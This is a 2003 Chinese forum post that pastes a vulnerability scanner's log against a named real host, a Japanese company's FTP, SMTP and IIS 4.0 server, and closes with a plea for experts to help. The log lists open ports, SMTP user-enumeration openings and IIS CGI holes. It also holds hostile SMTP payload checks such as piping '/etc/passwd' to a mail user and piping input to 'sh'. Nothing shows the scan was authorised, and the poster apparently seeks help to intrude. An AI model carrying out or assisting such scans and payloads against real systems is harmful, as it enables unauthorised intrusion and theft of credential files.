[这个贴子最后由seeker在 2003/08/24 02:07pm 第 1 次编辑]
扫描目标:61.120.21.85
扫描选项:
FTP漏洞
SMTP漏洞
FINGER漏洞
CGI漏洞
开始扫描......
目标IP地址为:61.120.21.85
扫描目标主机开放的端口:
21号端口(ftp)开放!
25号端口(smtp)开放!
80号端口(未知)开放!
443号端口(未知)开放!
6667号端口(未知)开放!
开始扫描FTP漏洞:
FTP服务器的Banner:
220-GuildFTPd FTP Server (c) 2001
220-revicnt02
220-Version 0.995
测试匿名用户
没有匿名用户
开始扫描SMTP漏洞:
SMTP服务器的Banner:
220-revicnt02.revic.co.jp Microsoft SMTP MAIL ready at Sun, 24 Aug 2003 14:34:01 +0900 Version: 5.5.1877.197.19
220 ESMTP spoken here
214-This server supports the following commands:
214-HELO EHLO STARTTLS RCPT DATA RSET MAIL VRFY QUIT HELP ETRN
214 End of HELP information
可以使用RCPT命令获得用户名列表.
可以使用VRFY命令获得用户名列表.
501 Argument missing
503 Send hello first
尝试利用RCPT命令获得目标机上存在的一些常见用户名:
检查decode别名:
检查漏洞
检查debug漏洞
检查kill漏洞
检查wiz漏洞
检查rcpt to: /tmp/.rhosts漏洞
检查+ +漏洞
检查RSET漏洞
检查mail from: |/bin/mail hacker < /etc/passwd漏洞
检查RSET漏洞
检查mail from: |tail|sh漏洞
开始扫描FINGER漏洞:
目标没有开放FINGER服务...
开始扫描CGI漏洞:
WWW服务器的Banner:
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://61.120.21.85/index.html
Date: Sun, 24 Aug 2003 05:34:56 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 20 Aug 2003 07:44:08 GMT
ETag: "caae86d6ee66c31:3964"
Content-Length: 7572
开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...
发现/?PageServices漏洞
发现/iisadmpwd/achg.htr漏洞
发现/iisadmpwd/aexp.htr漏洞
发现/_vti_inf.html漏洞
发现/iisadmpwd/aexp2.htr漏洞
高手帮忙啊~!!! |
